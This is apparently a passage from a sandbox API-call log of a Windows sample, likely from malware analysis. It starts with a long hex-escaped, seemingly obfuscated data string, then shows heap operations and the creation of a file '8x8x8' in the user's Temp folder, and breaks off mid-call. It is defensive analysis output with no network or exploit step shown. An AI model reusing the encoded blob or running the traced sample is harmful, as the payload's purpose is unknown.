7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0268.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.627] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0268.627] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0268.627] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0268.627] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0268.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0268.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0268.628] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0268.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0268.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0268.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0268.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0268.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0268.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0268.628] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0268.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0268.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0268.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0268.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0268.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0268.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0268.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0268.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d720 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0268.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0268.630] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0268.631] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.631] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf81c | out: lpNewFilePointer=0x0) returned 1 [0268.631] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.631] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf7fc | out: lpNewFilePointer=0x0) returned 1 [0268.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3561010 [0268.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0268.631] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf810 | out: lpNewFilePointer=0x0) returned 1 [0268.631] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf824, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf824*=0x0, lpOverlapped=0x0) returned 1 [0268.631] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.631] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf7fc | out: lpNewFilePointer=0x0) returned 1 [0268.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0268.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0268.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0268.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0268.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0268.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x24b1898, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0268.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.632] WriteFile (in: hFile=0x2a0, lpBuffer=0x34aa478*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x8bf820, lpOverlapped=0x0 | out: lpBuffer=0x34aa478*, lpNumberOfBytesWritten=0x8bf820*=0x0, lpOverlapped=0x0) returned 1 [0268.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.632] CloseHandle (hObject=0x2a0) returned 1 [0268.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.632] HeapFree (in: hHeap=0x25c0000, 